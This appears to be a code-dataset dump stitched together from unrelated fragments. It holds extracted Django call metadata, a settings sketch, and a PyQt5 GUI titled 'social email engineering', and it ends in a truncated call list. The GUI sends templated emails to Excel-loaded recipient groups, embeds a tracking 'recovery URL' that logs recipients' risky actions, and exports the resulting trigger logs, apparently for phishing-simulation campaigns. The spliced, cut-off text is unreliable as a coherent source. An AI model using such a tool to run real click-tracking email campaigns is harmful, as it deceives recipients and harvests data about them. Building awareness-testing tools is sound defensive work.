[((11, 4, 11, 35), 'django.urls.path', 'path', ({(11, 9, 11, 17): '"""admin/"""', (11, 19, 11, 34): 'admin.site.urls'}, {}), "('admin/', admin.site.urls)", False, 'from django.urls import path, include, re_path\n'), ((16, 19, 17, 60), 'django.conf.urls.static.static', 'static', (), '', False, 'from django.conf.urls.static import static\n'), ((8, 22, 8, 52), 'django.urls.include', 'include', ({(8, 30, 8, 51): '"""rest_framework.urls"""'}, {}), "('rest_framework.urls')", False, 'from django.urls import path, include, re_path\n'), ((9, 23, 9, 48), 'django.urls.include', 'include', ({(9, 31, 9, 47): '"""rest_auth.urls"""'}, {}), "('rest_auth.urls')", False, 'from django.urls import path, include, re_path\n'), ((10, 36, 10, 74), 'django.urls.include', 'include', ({(10, 44, 10, 73): '"""rest_auth.registration.urls"""'}, {}), "('rest_auth.registration.urls')", False, 'from django.urls import path, include, re_path\n'), ((12, 17, 12, 41), 'django.urls.include', 'include', ({(12, 25, 12, 40): '"""core.api.urls"""'}, {}), "('core.api.urls')", False, 'from django.urls import path, include, re_path\n'), ((22, 28, 22, 76), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', (), '', False, 'from django.views.generic import TemplateView\n')]
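A hedged sketch of the settings the URLConf above depends on; the directory names and `BASE_DIR` layout are illustrative assumptions, not taken from the project.

# Hypothetical settings fragment (illustrative values) backing the URLConf:
# static() needs MEDIA_URL/MEDIA_ROOT, and the catch-all TemplateView needs
# a template directory containing the built front-end's index.html.
import os

BASE_DIR = os.path.dirname(os.path.abspath(__file__))

DEBUG = True
MEDIA_URL = "/media/"
MEDIA_ROOT = os.path.join(BASE_DIR, "media")

TEMPLATES = [{
    "BACKEND": "django.template.backends.django.DjangoTemplates",
    "DIRS": [os.path.join(BASE_DIR, "build")],  # assumed location of index.html
    "APP_DIRS": True,
    "OPTIONS": {"context_processors": []},
}]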
karta1782310/python-docx-automated-report-generation
20200416_Socialmail/mailserverUi.py
f0e02a50a9e9547d131e583be0711aad72f08b51
#!/bin/bash # -*- coding: UTF-8 -*- # 基本控件都在这里面 from PyQt5.QtWebEngineWidgets import QWebEngineView from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView) from PyQt5.QtGui import QPalette, QColor, QBrush from PyQt5.QtCore import Qt, QDateTime from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions import qdarkstyle, sys import mylibrary.genmail as gm from GenAndSendMail import insert_send_mail from server.database import Database from server.sendmail import Smtp from server.client import Client from email import generator from pandas import DataFrame from copy import deepcopy class SubWindow(QWidget): def __init__(self): super().__init__() self.resize(400,100) self.main_layout = QGridLayout() self.setLayout(self.main_layout) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1) self.in_recipient = QLineEdit() self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5) self.btn_send = QPushButton('寄送') self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1) class MailserverUi(QMainWindow): def __init__(self): super().__init__() setConfigOption('background', '#19232D') setConfigOption('foreground', 'd') setConfigOptions(antialias = True) # self.resize(720,500) self.init_ui() self.data_smtp = [] self.data_db = [] self.data_logs = [] self.data_temp_logs = [] # self.sub_win = SubWindow() # 默認狀態欄 self.status = self.statusBar() self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: [email protected]") # 標題欄 self.setWindowTitle("社交郵件工程") self.setWindowOpacity(1) # 窗口透明度 self.main_layout.setSpacing(0) self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5()) self.main_widget.setStyleSheet( """ QComboBox::item:checked { height: 12px; border: 1px solid #32414B; margin-top: 0px; margin-bottom: 0px; padding: 4px; padding-left: 0px; } """ ) def init_ui(self): # 創建視窗主部件 self.main_widget = QWidget() # 創建主部件的網格佈局 self.main_layout = QGridLayout() # 設置窗口主部件佈局為網格佈局 self.main_widget.setLayout(self.main_layout) # 創建左側部件 self.left_widget = QWidget() self.left_widget.setObjectName('left_widget') self.left_layout = QGridLayout() self.left_widget.setLayout(self.left_layout) # 創建右側部件 self.right_widget = QWidget() self.right_widget.setObjectName('right_widget') self.right_layout = QGridLayout() self.right_widget.setLayout(self.right_layout) # 左側部件在第0行第0列,佔12行3列 self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3) # 右側部件在第0行第3列,佔12行8列 self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8) # 設置視窗主部件 self.setCentralWidget(self.main_widget) # 主要功能按鈕 self.btn_sendmail = QPushButton("發送信件") self.btn_sendmail.clicked.connect(self.display_send_mail) self.btn_smtp = QPushButton("系統設定") self.btn_smtp.clicked.connect(self.display_smtp_setting) self.btn_db = QPushButton("資料庫設定") self.btn_db.clicked.connect(self.display_db_setting) self.btn_update_eml = QPushButton("修改樣板") self.btn_update_eml.clicked.connect(self.display_update_eml) self.btn_get_logs = QPushButton("觸發明細") self.btn_get_logs.clicked.connect(self.display_logs) self.btn_download_logs = QPushButton("下載觸發明細") self.btn_download_logs.clicked.connect(self.logs_download) self.quit_btn = QPushButton("退出") self.quit_btn.clicked.connect(self.quit_act) self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3) self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3) self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3) 
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3) self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3) self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3) self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3) # 主要功能查詢 self.in_data = QLineEdit() self.in_data.setPlaceholderText("暫無") self.left_layout.addWidget(self.in_data, 1, 0, 1, 3) # 主要功能 log self.query_result = QTableWidget() self.left_layout.addWidget(self.query_result, 9, 0, 2, 3) self.query_result.verticalHeader().setVisible(False) self.right_display = GraphicsLayoutWidget() self.right_layout.addWidget(self.right_display, 0, 3, 12, 8) # 右側物件: sendmail self.in_eml_type = QLineEdit() self.in_eml_template = QLineEdit() self.btn_eml_browse = QPushButton('瀏覽') self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template)) self.in_recipient_group = QLineEdit() self.in_recipient_excel = QLineEdit() self.btn_recipient_browse = QPushButton('瀏覽') self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel)) self.in_annex_file = QLineEdit() self.btn_annex_file = QPushButton('瀏覽') self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file)) self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime()) self.in_scheduler.setCalendarPopup(True) self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm') self.cb_scheduler = QCheckBox('使用') self.btn_sendmail_start = QPushButton('執行') self.btn_sendmail_start.clicked.connect(self.send_mail) # 右側物件: smtp self.in_smtp_host = QLineEdit() self.in_smtp_port = QLineEdit() self.in_smtp_user = QLineEdit() self.in_smtp_password = QLineEdit() self.cb_smtp_ssl = QCheckBox('使用') self.in_smtp_test = QLineEdit() self.btn_smtp_save = QPushButton('儲存') self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp)) self.btn_smtp_test = QPushButton('測試') self.btn_smtp_test.clicked.connect(self.show_sub_win) # 右側物件: db self.in_db_host = QLineEdit() self.in_db_port = QLineEdit() self.in_db_user = QLineEdit() self.in_db_password = QLineEdit() self.in_db_database = QLineEdit() self.in_db_domain = QLineEdit() self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址') self.btn_db_save = QPushButton('儲存') self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db)) # 右側物件: update eml self.in_edit_sender = QLineEdit() self.in_edit_sender_name = QLineEdit() self.cb_edit_annex = QCheckBox('是') self.in_edit_annex = QLineEdit() self.btn_edit_annex = QPushButton('瀏覽') self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex)) self.in_edit_subject = QLineEdit() self.mail_tab = QTabWidget() self.mail_tab.setDocumentMode(True) self.mail_tab.currentChanged.connect(self.print_html) self.mail_tab_1 = QWidget() self.mail_tab_2 = QWidget() self.mail_tab.addTab(self.mail_tab_1, 'Html') self.mail_tab.addTab(self.mail_tab_2, 'Web') self.tab_1 = QGridLayout() self.tab_2 = QGridLayout() self.tab_1.setContentsMargins(0,0,0,0) self.tab_2.setContentsMargins(0,0,0,0) self.mail_tab_1.setLayout(self.tab_1) self.mail_tab_2.setLayout(self.tab_2) self.in_edit_html = QTextEdit() self.in_edit_web = QWebEngineView() self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1) self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1) self.btn_edit_eml_reset = QPushButton('清除') self.btn_edit_eml_reset.clicked.connect(self.eml_reset) self.btn_edit_eml_read = QPushButton('讀取') self.btn_edit_eml_read.clicked.connect(self.eml_open) self.btn_edit_eml_save = QPushButton('儲存') self.btn_edit_eml_save.clicked.connect(self.eml_save) # 右側物件: logs self.tbw_logs = 
QTableWidget() self.tbw_logs.verticalHeader().setVisible(False) self.cmb_logs_choice = QComboBox() self.in_logs_data = QLineEdit() self.in_logs_data.setPlaceholderText("輸入資料") self.btn_logs_search = QPushButton('執行') self.btn_logs_search.clicked.connect(self.logs_change) def display_send_mail(self): self.clear_layout(self.right_layout) labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7) self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6) self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1) self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7) self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1) self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6) self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1) self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6) self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1) self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2) def display_smtp_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7) self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7) self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2) self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2) def display_db_setting(self): self.clear_layout(self.right_layout) # 在右邊新增物件 labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"] for i, label in enumerate(labels): self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7) self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7) self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7) self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7) self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7) self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7) self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2) def display_update_eml(self): self.clear_layout(self.right_layout) labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"] for i, label in enumerate(labels): self.label = QLabel(label) self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight) self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7) self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7) self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7) self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6) self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1) self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7) self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7) self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2) self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2) def display_logs(self): 
self.data_temp_logs = [] self.tbw_logs.setRowCount(0) self.clear_layout(self.right_layout) self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8) self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1) self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2) self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3) self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2) try: db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database() self.data_logs = db.get_logs() self.data_temp_logs = deepcopy(self.data_logs) if self.data_logs: row_num = len(self.data_logs) col_num = len(self.data_logs[0]) col_lst = list(self.data_logs[0].keys()) self.cmb_logs_choice.clear() self.cmb_logs_choice.addItems(col_lst) self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents) self.tbw_logs.setHorizontalHeaderLabels(col_lst) for i in range(row_num): row_data = list(self.data_logs[i].values()) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(i, j, item) except: QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok) else: db.__disconnect__() def get_items_from_layout(self, layout): return [layout.itemAt(i).widget() for i in range(layout.count())] def save_data(self, data): items = self.get_items_from_layout(self.right_layout) data.clear() try: for item in items: if type(item) == type(QLineEdit()): data.append(item.text()) elif type(item) == type(QCheckBox()): data.append(item.isChecked()) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) print(data) def clear_layout(self, layout): for i in reversed(range(layout.count())): layout.itemAt(i).widget().setParent(None) def open_eml(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") obj.setText(file_name) def open_excel(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)") obj.setText(file_name) def open_word(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)") obj.setText(file_name) def open_annex(self, obj): file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)") org_files = obj.text() all_files = org_files + ',' + file_name if org_files else file_name obj.setText(all_files) def print_html(self, index): if index: self.in_edit_web.setHtml(self.in_edit_html.toPlainText()) def send_mail(self): eml_type = self.in_eml_type.text() eml_file = self.in_eml_template.text() user_group = self.in_recipient_group.text() mail_excel = self.in_recipient_excel.text() annex_file = self.in_annex_file.text() url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com' try: if self.cb_scheduler.isChecked(): my_time = self.in_scheduler.text()+':00' client = Client() client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time) QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok) else: sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp() db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database() 
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url) sm.close() db.__disconnect__() QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def show_sub_win(self): if self.data_smtp: self.sub_win = SubWindow() self.sub_win.btn_send.clicked.connect(self.send_test) self.sub_win.show() else: QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok) def send_test(self): try: if self.data_smtp: mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5]) error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text()) mailserver.close() if error: QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok) else: QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok) self.sub_win.in_recipient.clear() except: QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok) def eml_open(self): self.in_edit_html.clear() file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)") if not file_name: return header, html = gm.get_msg(file_name) self.in_edit_sender.setText(header[2]) self.in_edit_sender_name.setText(header[1]) self.in_edit_subject.setText(header[0]) self.in_edit_html.insertPlainText(html) def eml_save(self): header, msg = [], '' header.append(self.in_edit_subject.text()) header.append(self.in_edit_sender_name.text()) header.append(self.in_edit_sender.text()) header.append('[email protected]') annex_file = self.in_edit_annex.text().split(',') html = self.in_edit_html.toPlainText() if not any(header[:3]) or not html: return try: msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html) file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)') with open(file_path, 'w') as outfile: gen = generator.Generator(outfile) gen.flatten(msg) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) def eml_reset(self): items = self.get_items_from_layout(self.right_layout) for item in items: if type(item) == type(QLineEdit()): item.clear() self.cb_edit_annex.setChecked(False) self.in_edit_html.clear() def logs_change(self): if not self.data_logs or not self.in_logs_data.text(): return self.data_temp_logs = [] self.tbw_logs.setRowCount(0) # header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'} condition = self.cmb_logs_choice.currentText() content = self.in_logs_data.text() row_num = len(self.data_logs) col_num = len(self.data_logs[0]) # self.tbw_logs.setRowCount(row_num) self.tbw_logs.setColumnCount(col_num) for i in range(row_num): switch = False if condition == 'date' and content in str(self.data_logs[i][condition]): switch = True elif self.data_logs[i][condition] == content: switch = True if switch: self.tbw_logs.insertRow(self.tbw_logs.rowCount()) row_data = list(self.data_logs[i].values()) self.data_temp_logs.append(self.data_logs[i]) for j in range(col_num): temp_data = row_data[j] item = QTableWidgetItem(str(temp_data)) item.setForeground(QBrush(QColor(144, 182, 240))) self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item) def logs_download(self): if self.data_temp_logs: try: file_path, _ = 
QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)') if not file_path: return df = DataFrame(self.data_temp_logs) df.to_excel(file_path, index=False) QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) except: QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok) else: QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok) def quit_act(self): # sender 是发送信号的对象 sender = self.sender() print(sender.text() + '键被按下') qApp = QApplication.instance() qApp.quit() def main(): app = QApplication(sys.argv) gui = MailserverUi() gui.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
[((542, 10, 542, 32), 'PyQt5.QtWidgets.QApplication', 'QApplication', ({(542, 23, 542, 31): 'sys.argv'}, {}), '(sys.argv)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((29, 27, 29, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((35, 28, 35, 39), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((37, 24, 37, 45), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(37, 36, 37, 44): '"""寄送"""'}, {}), "('寄送')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((44, 8, 44, 48), 'pyqtgraph.setConfigOption', 'setConfigOption', ({(44, 24, 44, 36): '"""background"""', (44, 38, 44, 47): '"""#19232D"""'}, {}), "('background', '#19232D')", False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((45, 8, 45, 42), 'pyqtgraph.setConfigOption', 'setConfigOption', ({(45, 24, 45, 36): '"""foreground"""', (45, 38, 45, 41): '"""d"""'}, {}), "('foreground', 'd')", False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((46, 8, 46, 42), 'pyqtgraph.setConfigOptions', 'setConfigOptions', (), '', False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((82, 27, 82, 36), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((84, 27, 84, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((89, 27, 89, 36), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((91, 27, 91, 40), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((95, 28, 95, 37), 'PyQt5.QtWidgets.QWidget', 'QWidget', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, 
QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((97, 28, 97, 41), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((108, 28, 108, 55), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(108, 40, 108, 54): '"""發送信件"""'}, {}), "('發送信件')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((110, 24, 110, 51), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(110, 36, 110, 50): '"""系統設定"""'}, {}), "('系統設定')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((112, 22, 112, 52), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(112, 34, 112, 51): '"""資料庫設定"""'}, {}), "('資料庫設定')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((114, 30, 114, 57), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(114, 42, 114, 56): '"""修改樣板"""'}, {}), "('修改樣板')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((116, 28, 116, 56), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(116, 40, 116, 55): '"""\x08觸發明細"""'}, {}), "('\\x08觸發明細')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((118, 33, 118, 66), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(118, 45, 118, 65): '"""下載觸發明細"""'}, {}), "('下載觸發明細')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((120, 24, 120, 45), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(120, 36, 120, 44): '"""退出"""'}, {}), "('退出')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((132, 23, 132, 34), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((137, 28, 137, 42), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ({}, {}), '()', 
False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((141, 29, 141, 51), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ({}, {}), '()', False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((145, 27, 145, 38), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((146, 31, 146, 42), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, 